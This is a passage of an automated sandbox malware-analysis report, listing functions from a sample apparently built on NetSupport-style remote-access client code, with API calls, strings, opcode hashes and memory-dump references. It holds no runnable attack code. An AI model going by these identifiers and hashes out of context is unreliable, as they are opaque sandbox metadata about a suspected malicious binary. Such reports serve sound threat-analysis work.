                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strncpy
                                                                                    • String ID: 1000,50$1000,50
                                                                                    • API String ID: 2961919466-2776873633
                                                                                    • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                    • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                    • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                    • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                    • API String ID: 2400454052-4183089485
                                                                                    • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                    • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                    • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                    • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
                                                                                    APIs
                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 11153524
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11153513
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115350E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 67735064-2830328467
                                                                                    • Opcode ID: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                    • Instruction ID: 41066489dfbac7b1bedb0840a1a625780406ac6dbed52086b597086e3eac16ab
                                                                                    • Opcode Fuzzy Hash: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                    • Instruction Fuzzy Hash: 5FD022B5B69229ABC31096A1EC84FC1B3849B0832CF011834F03553400E660B8C08341